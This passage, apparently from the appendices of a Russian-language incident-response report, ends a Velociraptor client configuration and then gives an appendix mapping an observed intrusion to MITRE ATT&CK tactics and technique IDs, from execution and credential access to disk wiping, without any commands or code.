    name: velociraptor
    version: 0.7.0-2
    commit: 82f2cad
    build_time: "2023-09-10T15:23:01Z"
    ci_build_url: https://github.com/Velocidex/velociraptor/actions/runs/6137985901
    compiler: go1.21.0
use_self_signed_ssl: true
pinned_server_name: VelociraptorServer
max_upload_size: 5242880
local_buffer:
    memory_size: 52428800
    disk_size: 1073741824
    filename_linux: /var/tmp/Velociraptor_Buffer.bin
    filename_windows: $TEMP/ABuffer.bin
    filename_darwin: /var/tmp/Velociraptor_Buffer.bin
    


Приложение 3. MITRE

Тактики

Техника

Execution

T1053.005 - Scheduled Task/Job: Scheduled Task

T1569.002 - System Services: Service Execution

T1059.001 - Command and Scripting Interpreter: PowerShell

T1059.003 - Command and Scripting Interpreter: Windows Command Shell

T1059.006 - Command and Scripting Interpreter: Python

T1047 - Windows Management Instrumentation

T1072 - Software Deployment Tools

T1047 - Windows Management Instrumentation

Persistence

T1053.005 - Scheduled Task/Job: Scheduled Task

T1543.003 - Create or Modify System Process: Windows Service

T1078.002 - Valid Accounts: Domain Accounts

T1547 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

T1136.001 - Create Account: Local Account

T1505.003 - Server Software Component: Web Shell

Privilege Escalation

T1053.005 - Scheduled Task/Job: Scheduled Task

T1078.002 - Valid Accounts: Domain Accounts

Defence Evasion

T1036.005 - Masquerading: Match Legitimate Name or Location

T1562.001 - Impair Defenses: Disable or Modify Tools

T1562.002 - Impair Defenses: Disable Windows Event Logging

Credential Access

T1555.005 - Credentials from Password Stores: Password Managers

T1555 - Credentials from Password Stores

T1003.001 - OS Credential Dumping: LSASS Memory

T1552.001 - Unsecured Credentials: Credentials In Files

Discovery

T1083 - File and Directory Discovery

T1069.002 - Permission Groups Discovery: Domain Groups

T1087.002 - Account Discovery: Domain Account

T1033 - System Owner/User Discovery

T1018 - Remote System Discovery

Lateral Movement

T1021.002 - Remote Services: SMB/Windows Admin Shares

T1021.001 - Remote Services: Remote Desktop Protocol

T1072 - Software Deployment Tools

T1570 - Lateral Tool Transfer

Command and Control

T1572 - Protocol Tunneling

T1071.001 - Application Layer Protocol: Web Protocols

T1105 - Ingress Tool Transfer

T1219 - Remote Access Software

Impact

T1486 - Data Encrypted for Impact

T1561.001 - Disk Wipe: Disk Content Wipe

T1531 - Account Access Removal

T1561.002 - Disk Wipe: Disk Structure Wipe

T1490 - Inhibit System Recovery